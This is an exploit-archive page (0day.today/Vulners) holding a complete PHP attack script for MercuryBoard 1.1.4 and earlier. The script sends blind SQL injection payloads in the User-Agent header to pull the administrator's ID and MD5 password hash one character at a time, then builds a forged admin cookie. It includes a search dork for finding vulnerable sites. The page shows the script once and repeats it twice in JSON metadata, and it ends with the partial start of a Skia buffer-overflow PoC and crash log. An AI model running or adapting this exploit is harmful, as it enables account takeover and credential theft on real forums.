Search...

MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit

2006-08-23T00:00:00

ID 1337DAY-ID-736
Type zdt
Reporter rgod
Modified 2006-08-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
MercuryBoard &lt;= 1.1.4 (User-Agent) Remote SQL Injection Exploit
===============================================================




#!/usr/bin/php -q -d short_open_tag=on
&lt;?
print_r('
--------------------------------------------------------------------------------
MercuryBoard &lt;= 1.1.4 "User-Agent" SQL injection / privilege escalation exploit
(php version)
by rgod [email protected]
site: http://retrogod.altervista.org
dork: "Powered by MercuryBoard"
--------------------------------------------------------------------------------
');
/*
works regardless of php.ini settings
against MySQL &gt; 4.1 (allowing subs)
not working for me, so I wrote my version
vulnerability is actually unpatched...
*/

if ($argc&lt;3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to MercuryBoard
Options:
   -p[port]:    specify a port other than 80
   -P[ip:port]: specify a proxy
Examples:
php '.$argv[0].' localhost /mercury/
php '.$argv[0].' localhost /mercury/ -p81
php '.$argv[0].' localhost / -P1.1.1.1:80
--------------------------------------------------------------------------------
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i&lt;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i&lt;$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]&lt;&gt;'/') or ($path[strlen($path)-1]&lt;&gt;'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$packet="GET ".$p."index.php?a=active HTTP/1.0\r\n";
$packet.="User-Agent: '\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("REPLACE INTO",$html))
{
echo "vulnerable...\n";
$temp=explode("REPLACE INTO ",$html);
$temp2=explode("active",$temp[1]);
$prefix=$temp2[0];
echo "prefix -&gt; ".$prefix."\n";sleep(1);
}
else
{
die("not vulnerable...\n");
}

$ch[0]=0;//null
$ch=array_merge($ch,range(48,57)); //numbers
$j=1;
$id="";
echo "building the admin cookie...\nid: ";
while (!strstr($id,chr(0)))
{
for ($i=0; $i&lt;=255; $i++)
{
if (in_array($i,$ch))
{
$packet="GET ".$p."index.php?a=active HTTP/1.0\r\n";
$packet.="User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_id,".$j.",1))=".$i."),'suntzu','suntzoi'))/**/FROM/**/".$prefix."users/**/WHERE/**/user_group=1))/*\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax near 'SELECT",$html))
{die("\nWrong MySql version, sorry...");}
if (!eregi("Viewing the active users",$html)) {$id.=chr($i);echo chr($i);sleep(1);break;}
}
if ($i==255) {die("\nExploit failed...");}
}
$j++;
}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
echo "\npassword (md5): ";
while (!strstr($password,chr(0)))
{
for ($i=0; $i&lt;=255; $i++)
{
if (in_array($i,$chars))
{
$packet="GET ".$p."index.php?a=active HTTP/1.0\r\n";
$packet.="User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_password,".$j.",1))=".$i."),'suntzu','suntzoi'))/**/FROM/**/".$prefix."users/**/WHERE/**/user_group=1))/*\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi("Viewing the active users",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}
}
if ($i==255) {die("\nExploit failed...");}
}
$j++;
}
echo "\nyour admin cookie:\n mercury_user=$id; mercury_pass=$password;\n";
?&gt;



#  0day.today [2018-04-10]  #

JSON Vulners Source

Initial Source

{"published": "2006-08-23T00:00:00", "id": "1337DAY-ID-736", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T02:31:14", "bulletin": {"published": "2006-08-23T00:00:00", "id": "1337DAY-ID-736", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-19T02:31:14", "vector": "AV:L/AC:L/Au:M/C:C/I:C/A:C/"}}, "hash": "995730d39f32837b50a6814285ba47fff9c1c22c3b2fcc2259f479fcd5a8fca5", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T02:31:14", "edition": 1, "title": "MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit", "href": "http://0day.today/exploit/description/736", "modified": "2006-08-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "http://0day.today/exploit/736", "references": [], "reporter": "rgod", "sourceData": "===============================================================\r\nMercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit\r\n===============================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nMercuryBoard <= 1.1.4 \"User-Agent\" SQL injection / privilege escalation exploit\r\n(php version)\r\nby rgod rgod@autistici.org\r\nsite: http://retrogod.altervista.org\r\ndork: \"Powered by MercuryBoard\"\r\n--------------------------------------------------------------------------------\r\n');\r\n/*\r\nworks regardless of php.ini settings\r\nagainst MySQL > 4.1 (allowing subs)\r\nnot working for me, so I wrote my version\r\nvulnerability is actually unpatched...\r\n*/\r\n\r\nif ($argc<3) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to MercuryBoard\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExamples:\r\nphp '.$argv[0].' localhost /mercury/\r\nphp '.$argv[0].' localhost /mercury/ -p81\r\nphp '.$argv[0].' localhost / -P1.1.1.1:80\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n }\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: '\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"REPLACE INTO\",$html))\r\n{\r\necho \"vulnerable...\\n\";\r\n$temp=explode(\"REPLACE INTO \",$html);\r\n$temp2=explode(\"active\",$temp[1]);\r\n$prefix=$temp2[0];\r\necho \"prefix -> \".$prefix.\"\\n\";sleep(1);\r\n}\r\nelse\r\n{\r\ndie(\"not vulnerable...\\n\");\r\n}\r\n\r\n$ch[0]=0;//null\r\n$ch=array_merge($ch,range(48,57)); //numbers\r\n$j=1;\r\n$id=\"\";\r\necho \"building the admin cookie...\\nid: \";\r\nwhile (!strstr($id,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$ch))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_id,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"You have an error in your SQL syntax near 'SELECT\",$html))\r\n{die(\"\\nWrong MySql version, sorry...\");}\r\nif (!eregi(\"Viewing the active users\",$html)) {$id.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\necho \"\\npassword (md5): \";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$chars))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_password,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (!eregi(\"Viewing the active users\",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\necho \"\\nyour admin cookie:\\n mercury_user=$id; mercury_pass=$password;\\n\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f56987f4986db4e8c8c139b95e0228f9", "key": "sourceData"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "0280c4d4eb9bba482901450f73ca1922", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "modified"}, {"hash": "7e20f5817bb52696c74ad6a3f7977197", "key": "title"}, {"hash": "db922059e8fc0bd66cac9e3660863428", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "ebc234b82f4e6ff74433f20e87530143043a81cb5c0717a941216babb12fbeff", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["ACTIVEMQ_5_15_5.NASL", "ORACLE_WEBCENTER_SITES_APR_2018_CPU.NASL", "VIRTUOZZO_VZLSA-2017-0021.NASL", "EULEROS_SA-2017-1008.NASL", "EULEROS_SA-2017-1007.NASL", "DEBIAN_DSA-3818.NASL"]}, {"type": "kaspersky", "idList": ["KLA11306", "KLA11098"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148068", "PACKETSTORM:144878"]}, {"type": "exploitdb", "idList": ["EDB-ID:44846", "EDB-ID:43111", "EDB-ID:42021"]}, {"type": "zdt", "idList": ["1337DAY-ID-30541", "1337DAY-ID-28948", "1337DAY-ID-27797", "1337DAY-ID-27576"]}, {"type": "seebug", "idList": ["SSV:97208"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}], "modified": "2018-04-10T09:50:42"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-04-10T09:50:42", "edition": 2, "title": "MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit", "href": "https://0day.today/exploit/description/736", "modified": "2006-08-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 16, "cvelist": [], "sourceHref": "https://0day.today/exploit/736", "references": [], "reporter": "rgod", "sourceData": "===============================================================\r\nMercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit\r\n===============================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nMercuryBoard <= 1.1.4 \"User-Agent\" SQL injection / privilege escalation exploit\r\n(php version)\r\nby rgod [email\u00a0protected]\r\nsite: http://retrogod.altervista.org\r\ndork: \"Powered by MercuryBoard\"\r\n--------------------------------------------------------------------------------\r\n');\r\n/*\r\nworks regardless of php.ini settings\r\nagainst MySQL > 4.1 (allowing subs)\r\nnot working for me, so I wrote my version\r\nvulnerability is actually unpatched...\r\n*/\r\n\r\nif ($argc<3) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to MercuryBoard\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExamples:\r\nphp '.$argv[0].' localhost /mercury/\r\nphp '.$argv[0].' localhost /mercury/ -p81\r\nphp '.$argv[0].' localhost / -P1.1.1.1:80\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n }\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: '\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"REPLACE INTO\",$html))\r\n{\r\necho \"vulnerable...\\n\";\r\n$temp=explode(\"REPLACE INTO \",$html);\r\n$temp2=explode(\"active\",$temp[1]);\r\n$prefix=$temp2[0];\r\necho \"prefix -> \".$prefix.\"\\n\";sleep(1);\r\n}\r\nelse\r\n{\r\ndie(\"not vulnerable...\\n\");\r\n}\r\n\r\n$ch[0]=0;//null\r\n$ch=array_merge($ch,range(48,57)); //numbers\r\n$j=1;\r\n$id=\"\";\r\necho \"building the admin cookie...\\nid: \";\r\nwhile (!strstr($id,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$ch))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_id,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"You have an error in your SQL syntax near 'SELECT\",$html))\r\n{die(\"\\nWrong MySql version, sorry...\");}\r\nif (!eregi(\"Viewing the active users\",$html)) {$id.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\necho \"\\npassword (md5): \";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$chars))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_password,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (!eregi(\"Viewing the active users\",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\necho \"\\nyour admin cookie:\\n mercury_user=$id; mercury_pass=$password;\\n\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "4544196b6d2b7e187f4b98f0616b2219", "key": "href"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "modified"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "ec5e6c04c1e89705cb44984dede7b27e", "key": "sourceData"}, {"hash": "38262308515fb51c8c218547cf9f9057", "key": "sourceHref"}, {"hash": "7e20f5817bb52696c74ad6a3f7977197", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"zdt": [{"lastseen": "2019-02-25T06:30:28", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "1337DAY-ID-32141", "href": "https://0day.today/exploit/description/32141", "title": "Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows Exploit", "type": "zdt", "sourceData": "I was looking into the root cause of https://bugs.chromium.org/p/chromium/issues/detail?id=850350. In that bug, due to precision errors, Skia generated a concave RRect, but declared it convex. Later, the RRect was transformed with an affine transform and used as a clipping region for drawing. Because the convex path filling algorithm was used while the path was actually concave, this broke some assumptions and led to a stack out-of-bounds write.\r\n\r\nThe bug was fixed by addressing the precision errors in RRect generation. However, there is another subtle issue:\r\n\r\nIf Skia ever declares a path convex, the convexity attribute is going to survive affine transforms. Normally, in geometry, transforming a convex path with an affine transform is always going to result in a convex path. However, in Skia, due to precision limitations, that assumption might be incorrect because:\r\n\r\n a) Due to precision errors, Skia may declare a polygon with tiny concavities to be convex. Using an affine transform, the concavities can then be rotated and enlarged.\r\n b) It might be possible, that due to precision errors, applying an affine transform on a convex path might result in tiny concavities that can be blown up by subsequent transformations.\r\n\r\nThere are possible multiple places where using a concave polygon with incorrect convexity attribute might lead to problems. The one I used in the PoC is the same as in https://bugs.chromium.org/p/chromium/issues/detail?id=850350. What happens there is walk_convex_edges() being used on a concave path:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?l=213&rcl=61c5108108acaeb4ee7fc8cb97c41f4f97d99040\r\nThis leads to breaking another Skia assumption - that the image is always going to be rendered in the top-to-bottom, left-to-right order.\r\nIf the path is used as a clipping region, this leads to incorrect ordering of runs in SkRgnBuilder. When the correspoding SkRgnClipBlitter is used, the \"left < right\" assumption gets broken here\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkBlitter.cpp?l=612&rcl=b2a232fb20358ccd6c7c2fafb7e83e444e4e2458\r\nwhich results in calling SkAlphaRuns::Break with the negative \"count\" argument, which leads to out-of-bounds write here:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154\r\n\r\nThe following Skia program demonstrates the issue:\r\n\r\n=================================================================\r\n\r\n#include <stdio.h>\r\n\r\n#include \"SkCanvas.h\"\r\n#include \"SkPath.h\"\r\n#include \"SkBitmap.h\"\r\n#include \"SkRegion.h\"\r\n\r\nint main(int argc, char * const argv[]) {\r\n\r\n SkBitmap bitmap;\r\n bitmap.allocN32Pixels(24, 24);\r\n SkCanvas canvas(bitmap);\r\n\r\n SkPaint paint;\r\n paint.setAntiAlias(true);\r\n paint.setStyle(SkPaint::kFill_Style);\r\n\r\n // This is monotone in both x and y, but has a tiny concavity\r\n SkPath path;\r\n path.moveTo(-1,-1);\r\n path.lineTo(0, 0);\r\n path.lineTo(0, 0.5e-10);\r\n path.lineTo(0.1e-10, 1.1e-10);\r\n path.lineTo(1.5e-10, 1.1e-10);\r\n path.lineTo(1.5e-10, 2.5e-10);\r\n path.lineTo(0.9, 1);\r\n path.lineTo(-1, 1);\r\n path.close();\r\n\r\n // If asked, Skia is going to declare it convex\r\n if(path.isConvex()) {\r\n printf(\"convex\\n\");\r\n } else {\r\n printf(\"not convex\\n\");\r\n }\r\n\r\n // The convexity flag is going to survive all affine transforms\r\n // Even those that will enlarge the concavity and make the path\r\n // non-monotone.\r\n SkMatrix m;\r\n m.setRotate(-45);\r\n m.postScale(10e10, 10e10);\r\n m.postSkew(-1, 0);\r\n m.postTranslate(1, 10);\r\n path.transform(m);\r\n\r\n // As demonstrated here\r\n if(path.isConvex()) {\r\n printf(\"convex\\n\");\r\n } else {\r\n printf(\"not convex\\n\");\r\n }\r\n\r\n // We'll use the path as a clip region\r\n canvas.clipPath(path);\r\n\r\n // And now we'll just draw a simple triangle.\r\n SkPath path2;\r\n path2.moveTo(15.5, 15);\r\n path2.lineTo(50.5, 50);\r\n path2.lineTo(-19.5, 50);\r\n path2.close();\r\n canvas.drawPath(path2, paint);\r\n\r\n printf(\"done\\n\");\r\n\r\n return 0;\r\n}\r\n\r\n=================================================================\r\n\r\nASan log:\r\n\r\n=================================================================\r\n==139872==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc5c8950d4 at pc 0x00000135512e bp 0x7ffc5c894f30 sp 0x7ffc5c894f28\r\nWRITE of size 1 at 0x7ffc5c8950d4 thread T0\r\n #0 0x135512d in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26\r\n #1 0x135512d in SkRgnClipBlitter::blitAntiH(int, int, unsigned char const*, short const*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.cpp:615\r\n #2 0xac437f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:96:15\r\n #3 0x1465fa4 in blit_trapezoid_row(AdditiveBlitter*, int, int, int, int, int, int, int, unsigned char, unsigned char*, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp\r\n #4 0x1465fa4 in aaa_walk_convex_edges(SkAnalyticEdge*, AdditiveBlitter*, int, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1187\r\n #5 0x1465fa4 in 